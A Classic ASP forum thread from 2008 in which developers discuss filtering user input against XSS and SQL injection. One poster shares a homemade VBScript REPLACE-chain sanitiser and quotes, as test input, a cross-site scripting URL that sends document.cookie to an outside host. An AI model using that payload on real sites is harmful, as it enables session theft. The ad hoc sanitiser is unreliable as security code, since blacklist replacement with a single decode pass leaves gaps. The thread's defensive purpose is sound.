Wrox Programmer Forums

Need to download code?

View our list of code downloads.

Register | FAQ | Members List | Calendar | Search | Today's Posts | Mark Forums Read
Classic ASP Professional For advanced coder questions in ASP 3. NOT for ASP.NET 1.0, 1.1, or 2.0.
Welcome to the p2p.wrox.com Forums.

You are currently viewing the Classic ASP Professional section of the Wrox Programmer to Programmer discussions. This is a community of tens of thousands of software programmers and website developers including Wrox book authors and readers. As a guest, you can read any forum posting. By joining today you can post your own programming questions, respond to other developers’ questions, and eliminate the ads that are displayed to guests. Registration is fast, simple and absolutely free .
DRM-free e-books 300x50
Reply
 
Thread Tools Display Modes
  #1 (permalink)  
Old March 6th, 2008, 01:28 PM
Friend of Wrox
 
Join Date: Sep 2003
Location: Minneapolis, MN, USA.
Posts: 171
Thanks: 0
Thanked 1 Time in 1 Post
Default Code Injection

Does anyone have any fool proof way of filtering all non alpha-numeric values from user input but allow predefined HTML tags such as:

<b></b>
<i></i>
[u]</u>
<table></table>
<tr></tr>
<td></td>
<ol></ol>[list]</ul>
<li></li>

as well as maintaining non threatening links? Any help on this is greatly appreciated. Thanks in advance.

Dave

Reply With Quote
  #2 (permalink)  
Old March 6th, 2008, 03:07 PM
Wrox Author
Points: 13,255, Level: 49
Points: 13,255, Level: 49 Points: 13,255, Level: 49 Points: 13,255, Level: 49
Activity: 0%
Activity: 0% Activity: 0% Activity: 0%
 
Join Date: Oct 2005
Location: Ohio, USA
Posts: 4,104
Thanks: 1
Thanked 64 Times in 64 Posts
Send a message via AIM to dparsons
Default

With regard to the predefined tags, IMHO, it it better practice to use a type of forum code.  For example if I want to make some text bold on this forum I use [ b ] [ /b ] with no spaces.  The forum then translates that into <b></b>.

If you take this approach with the predefined tags your job of handling malicious code becomes easier because you can simply HTMLEncode the rest of the input which will render most XSS attacks useless.  However, if you are looking for an apporach to detect a <script></script> block, for example, you should use Regular Expressions.  (You could of course use InStr() but that isn't nearly as efficient as RegEx)

The easiest way to avoid SQL Injection attacks is to use parameterized queries as opposed to inline dynamic sql.  

hth.

================================================== =========
Read this if you want to know how to get a correct reply for your question:
http://www.catb.org/~esr/faqs/smart-questions.html
================================================== =========
.: Wrox Technical Editor / Author :.
Wrox Books 24 x 7
================================================== =========
Reply With Quote
  #3 (permalink)  
Old March 6th, 2008, 06:04 PM
Friend of Wrox
 
Join Date: Sep 2003
Location: Minneapolis, MN, USA.
Posts: 171
Thanks: 0
Thanked 1 Time in 1 Post
Default

I thought about using regular expressions, but I don't quite have the experience with them to get something really bullet proof in a short amount of time.

I thought of a solution that I think might work well using pseudo tags (i.e. forum tags) and thought I'd post the code to get some other opinions. It requires defining some accepatable pseudo tags and assigning them a unique alpha numeric value, in my case 32 digits in length.

There are 4 replace filters that I run the string through and they are as follows:
1) Replace all encoded values into their standard values (e.g. '%26' to '&').
2) Transpose pseudo tags into 32 digit unique value. (e.g. '[ul]' to 'koxfyyyao5u2s8kzuj6nrev2ujkkhrvx1')
3) Replace all non-acceptable characters into the equivelant HTML code OR possibly remove them all together (e.g. '<' to '#60;').
4) Transpose all unique 32 digit values to previous pseudo tags (e.g. 'koxfyyyao5u2s8kzuj6nrev2ujkkhrvx1' to '[ul]').
5) Translate pseudo tags at run time (e.g. '[ul]' to '[list]').

I think that if this is run against some rogue injection that the result will be enough to eliminate the threat even though the output is less than desireable. It should however work well for standard text, including minor HTML tags.

If anyone has any thoughts on this I would live to hear them. The solution is as follows:

NOTE: I had to add in a couple of speces for pseudos to avoid being interpreted by this forum (e.g. [ url ]).

<%
'-- Malicious URL --
MyString = "[ url ] h ttp://host/a.php?variable=%22%3e%3c%73%63%72%69%70%74%3e%64%6 f%63%75%6d%65%6e%74%2e%6c%6f%63%61%74%69%6f%6e%3d% 27%68%74%74%70%3a%2f%2f%77%77%77%2e%63%67%69%73%65 %63%75%72%69%74%79%2e%63%6f%6d%2f%63%67%69%2d%62%6 9%6e%2f%63%6f%6f%6b%69%65%2e%63%67%69%3f%27%20%2b% 64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c%2f %73%63%72%69%70%74%3e[ -url ]Test Link[ /url ]"

'-- OR --

'-- Malicious URL --
h ttp://host/a.php?variable="><script>document.location='h ttp://w ww.cgisecurity.com/cgi-bin/cookie.cgi? '%20+document.cookie</script>


' == replace hex values with standard values ==
    MyString = REPLACE(MyString, "%20", " ")
    MyString = REPLACE(MyString, "%21", "!")
    MyString = REPLACE(MyString, "%22", """")
    MyString = REPLACE(MyString, "%23", "#")
    MyString = REPLACE(MyString, "%24", "$")
    MyString = REPLACE(MyString, "%25", "%")
    MyString = REPLACE(MyString, "%26", "&")
    MyString = REPLACE(MyString, "%27", "''")
    MyString = REPLACE(MyString, "%28", "(")
    MyString = REPLACE(MyString, "%29", ")")
    MyString = REPLACE(MyString, "%2a", "*")
    MyString = REPLACE(MyString, "%2b", "+")
    MyString = REPLACE(MyString, "%2c", ",")
    MyString = REPLACE(MyString, "%2d", "-")
    MyString = REPLACE(MyString, "%2e", ".")
    MyString = REPLACE(MyString, "%2f", "/")
    MyString = REPLACE(MyString, "%2A", "*")
    MyString = REPLACE(MyString, "%2B", "+")
    MyString = REPLACE(MyString, "%2C", ",")
    MyString = REPLACE(MyString, "%2D", "-")
    MyString = REPLACE(MyString, "%2E", ".")
    MyString = REPLACE(MyString, "%2F", "/")
    MyString = REPLACE(MyString, "%30", "0")
    MyString = REPLACE(MyString, "%31", "1")
    MyString = REPLACE(MyString, "%32", "2")
    MyString = REPLACE(MyString, "%33", "3")
    MyString = REPLACE(MyString, "%34", "4")
    MyString = REPLACE(MyString, "%35", "5")
    MyString = REPLACE(MyString, "%36", "6")
    MyString = REPLACE(MyString, "%37", "7")
    MyString = REPLACE(MyString, "%38", "8")
    MyString = REPLACE(MyString, "%39", "9")
    MyString = REPLACE(MyString, "%3a", ":")
    MyString = REPLACE(MyString, "%3b", ";")
    MyString = REPLACE(MyString, "%3c", "<")
    MyString = REPLACE(MyString, "%3d", "=")
    MyString = REPLACE(MyString, "%3e", ">")
    MyString = REPLACE(MyString, "%3f", "?")
    MyString = REPLACE(MyString, "%3A", ":")
    MyString = REPLACE(MyString, "%3B", ";")
    MyString = REPLACE(MyString, "%3C", "<")
    MyString = REPLACE(MyString, "%3D", "=")
    MyString = REPLACE(MyString, "%3E", ">")
    MyString = REPLACE(MyString, "%3F", "?")
    MyString = REPLACE(MyString, "%40", "@")
    MyString = REPLACE(MyString, "%41", "A")
    MyString = REPLACE(MyString, "%42", "B")
    MyString = REPLACE(MyString, "%43", "C")
    MyString = REPLACE(MyString, "%44", "D")
    MyString = REPLACE(MyString, "%45", "E")
    MyString = REPLACE(MyString, "%46", "F")
    MyString = REPLACE(MyString, "%47", "G")
    MyString = REPLACE(MyString, "%48", "H")
    MyString = REPLACE(MyString, "%49", "I")
    MyString = REPLACE(MyString, "%4a", "J")
    MyString = REPLACE(MyString, "%4b", "K")
    MyString = REPLACE(MyString, "%4c", "L")
    MyString = REPLACE(MyString, "%4d", "M")
    MyString = REPLACE(MyString, "%4e", "N")
    MyString = REPLACE(MyString, "%4f", "O")
    MyString = REPLACE(MyString, "%4A", "J")
    MyString = REPLACE(MyString, "%4B", "K")
    MyString = REPLACE(MyString, "%4C", "L")
    MyString = REPLACE(MyString, "%4D", "M")
    MyString = REPLACE(MyString, "%4E", "N")
    MyString = REPLACE(MyString, "%4F", "O")
    MyString = REPLACE(MyString, "%50", "P")
    MyString = REPLACE(MyString, "%51", "Q")
    MyString = REPLACE(MyString, "%52", "R")
    MyString = REPLACE(MyString, "%53", "S")
    MyString = REPLACE(MyString, "%54", "T")
    MyString = REPLACE(MyString, "%55", "U")
    MyString = REPLACE(MyString, "%56", "V")
    MyString = REPLACE(MyString, "%57", "W")
    MyString = REPLACE(MyString, "%58", "X")
    MyString = REPLACE(MyString, "%59", "Y")
    MyString = REPLACE(MyString, "%5a", "Z")
    MyString = REPLACE(MyString, "%5b", "[")
    MyString = REPLACE(MyString, "%5c", "\")
    MyString = REPLACE(MyString, "%5d", "]")
    MyString = REPLACE(MyString, "%5e", "^")
    MyString = REPLACE(MyString, "%5f", "_")
    MyString = REPLACE(MyString, "%5A", "Z")
    MyString = REPLACE(MyString, "%5B", "[")
    MyString = REPLACE(MyString, "%5C", "\")
    MyString = REPLACE(MyString, "%5D", "]")
    MyString = REPLACE(MyString, "%5E", "^")
    MyString = REPLACE(MyString, "%5F", "_")
    MyString = REPLACE(MyString, "%60", "`")
    MyString = REPLACE(MyString, "%61", "a")
    MyString = REPLACE(MyString, "%62", "b")
    MyString = REPLACE(MyString, "%63", "c")
    MyString = REPLACE(MyString, "%64", "d")
    MyString = REPLACE(MyString, "%65", "e")
    MyString = REPLACE(MyString, "%66", "f")
    MyString = REPLACE(MyString, "%67", "g")
    MyString = REPLACE(MyString, "%68", "h")
    MyString = REPLACE(MyString, "%69", "i")
    MyString = REPLACE(MyString, "%6a", "j")
    MyString = REPLACE(MyString, "%6b", "k")
    MyString = REPLACE(MyString, "%6c", "l")
    MyString = REPLACE(MyString, "%6d", "m")
    MyString = REPLACE(MyString, "%6e", "n")
    MyString = REPLACE(MyString, "%6f", "o")
    MyString = REPLACE(MyString, "%6A", "j")
    MyString = REPLACE(MyString, "%6B", "k")
    MyString = REPLACE(MyString, "%6C", "l")
    MyString = REPLACE(MyString, "%6D", "m")
    MyString = REPLACE(MyString, "%6E", "n")
    MyString = REPLACE(MyString, "%6F", "o")
    MyString = REPLACE(MyString, "%70", "p")
    MyString = REPLACE(MyString, "%71", "q")
    MyString = REPLACE(MyString, "%72", "r")
    MyString = REPLACE(MyString, "%73", "s")
    MyString = REPLACE(MyString, "%74", "t")
    MyString = REPLACE(MyString, "%75", "u")
    MyString = REPLACE(MyString, "%76", "v")
    MyString = REPLACE(MyString, "%77", "w")
    MyString = REPLACE(MyString, "%78", "x")
    MyString = REPLACE(MyString, "%79", "y")
    MyString = REPLACE(MyString, "%7a", "z")
    MyString = REPLACE(MyString, "%7b", "{")
    MyString = REPLACE(MyString, "%7c", "|")
    MyString = REPLACE(MyString, "%7d", "}")
    MyString = REPLACE(MyString, "%7e", "~")
    MyString = REPLACE(MyString, "%7A", "z")
    MyString = REPLACE(MyString, "%7B", "{")
    MyString = REPLACE(MyString, "%7C", "|")
    MyString = REPLACE(MyString, "%7D", "}")
    MyString = REPLACE(MyString, "%7F", "~")
    response.write "1: " & MyString & "<br><br>"


' == transpose pseudo tags into 32 digit unique values ==
    MyString = REPLACE(MyString, "[ url]", "ix8yyagzczursx3ujnyfqj6hkaeftcye1")
    MyString = REPLACE(MyString, "[ -url]", "ix8yyagzczursx3ujnyfqj6hkaeftcye2")
    MyString = REPLACE(MyString, "[ /url]", "ix8yyagzczursx3ujnyfqj6hkaeftcye3")
    MyString = REPLACE(MyString, "[ol]", "w6ck3hngas7asxqgzdcvp8gklp5gvytr1")
    MyString = REPLACE(MyString, "[/ol]", "w6ck3hngas7asxqgzdcvp8gklp5gvytr2")
    MyString = REPLACE(MyString, "[ul]", "koxfyyyao5u2s8kzuj6nrev2ujkkhrvx1")
    MyString = REPLACE(MyString, "[/ul]", "koxfyyyao5u2s8kzuj6nrev2ujkkhrvx2")
    MyString = REPLACE(MyString, "[li]", "pnqxkkk3zlvupblgayqyksv7nfs5zrcd1")
    MyString = REPLACE(MyString, "[/li]", "pnqxkkk3zlvupblgayqyksv7nfs5zrcd2")
    MyString = REPLACE(MyString, "[ URL]", "ix8yyagzczursx3ujnyfqj6hkaeftcye1")
    MyString = REPLACE(MyString, "[ -URL]", "ix8yyagzczursx3ujnyfqj6hkaeftcye2")
    MyString = REPLACE(MyString, "[ /URL]", "ix8yyagzczursx3ujnyfqj6hkaeftcye3")
    MyString = REPLACE(MyString, "[OL]", "w6ck3hngas7asxqgzdcvp8gklp5gvytr1")
    MyString = REPLACE(MyString, "[/OL]", "w6ck3hngas7asxqgzdcvp8gklp5gvytr2")
    MyString = REPLACE(MyString, "[UL]", "koxfyyyao5u2s8kzuj6nrev2ujkkhrvx1")
    MyString = REPLACE(MyString, "[/UL]", "koxfyyyao5u2s8kzuj6nrev2ujkkhrvx2")
    MyString = REPLACE(MyString, "[LI]", "pnqxkkk3zlvupblgayqyksv7nfs5zrcd1")
    MyString = REPLACE(MyString, "[/LI]", "pnqxkkk3zlvupblgayqyksv7nfs5zrcd2")


' == replace non-acceptable characters with html values ==
' MyString = REPLACE(MyString, ";", "#59;")
    MyString = REPLACE(MyString, "!", "#33;")
    MyString = REPLACE(MyString, """", "#34;")
' MyString = REPLACE(MyString, "#", "#35;")
    MyString = REPLACE(MyString, "$", "#36;")
    MyString = REPLACE(MyString, "%", "#37;")
' MyString = REPLACE(MyString, "&", "#38;")
    MyString = REPLACE(MyString, "''", "#39;")
    MyString = REPLACE(MyString, "(", "#40;")
    MyString = REPLACE(MyString, ")", "#41;")
    MyString = REPLACE(MyString, "*", "#42;")
    MyString = REPLACE(MyString, "+", "#43;")
    MyString = REPLACE(MyString, ",", "#44;")
    MyString = REPLACE(MyString, "-", "#45;")
    MyString = REPLACE(MyString, ".", "#46;")
    MyString = REPLACE(MyString, "/", "#47;")
    MyString = REPLACE(MyString, ":", "#58;")
    MyString = REPLACE(MyString, "<", "")
    MyString = REPLACE(MyString, "=", "#61;")
    MyString = REPLACE(MyString, ">", "")
    MyString = REPLACE(MyString, "?", "#63;")
    MyString = REPLACE(MyString, "@", "#64;")
    MyString = REPLACE(MyString, "[", "")
    MyString = REPLACE(MyString, "\", "#92;")
    MyString = REPLACE(MyString, "]", "")
    MyString = REPLACE(MyString, "^", "#94;")
    MyString = REPLACE(MyString, "_", "#95;")
    MyString = REPLACE(MyString, "`", "#96;")
    MyString = REPLACE(MyString, "{", "#123;")
    MyString = REPLACE(MyString, "|", "#124;")
    MyString = REPLACE(MyString, "}", "#125;")
    MyString = REPLACE(MyString, "~", "#126;")


' == transpose 32 digit unique values into pseudo tags ==
    MyString = REPLACE(MyString, "ix8yyagzczursx3ujnyfqj6hkaeftcye1", "[ url]")
    MyString = REPLACE(MyString, "ix8yyagzczursx3ujnyfqj6hkaeftcye2", "[ -url]")
    MyString = REPLACE(MyString, "ix8yyagzczursx3ujnyfqj6hkaeftcye3", "[ /url]")
    MyString = REPLACE(MyString, "w6ck3hngas7asxqgzdcvp8gklp5gvytr1", "[ol]")
    MyString = REPLACE(MyString, "w6ck3hngas7asxqgzdcvp8gklp5gvytr2", "[/ol]")
    MyString = REPLACE(MyString, "koxfyyyao5u2s8kzuj6nrev2ujkkhrvx1", "[ul]")
    MyString = REPLACE(MyString, "koxfyyyao5u2s8kzuj6nrev2ujkkhrvx2", "[/ul]")
    MyString = REPLACE(MyString, "pnqxkkk3zlvupblgayqyksv7nfs5zrcd1", "[li]")
    MyString = REPLACE(MyString, "pnqxkkk3zlvupblgayqyksv7nfs5zrcd2", "[/li]")

    response.write "4: " & MyString & "<br><br>"
%>
Reply With Quote
Reply


Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off
Trackbacks are Off
Pingbacks are On
Refbacks are Off

Similar Threads
Thread Thread Starter Forum Replies Last Post
sql injection trufla Classic ASP Basics 2 June 16th, 2008 02:54 PM
SQL Injection cygnusx04 Classic ASP Databases 1 November 6th, 2004 10:06 AM
What SQL Injection is ? minhtri Classic ASP Basics 2 October 20th, 2004 10:11 PM
Script Injection in Sql Server farhan_iac Classic ASP Professional 6 August 20th, 2004 03:41 AM
Security: Preventing SQL Injection taliesin Classic ASP Professional 2 July 4th, 2003 02:43 AM



All times are GMT -4. The time now is 09:20 AM.


Powered by vBulletin®
Copyright ©2000 - 2018, Jelsoft Enterprises Ltd.
© 2013 John Wiley & Sons, Inc.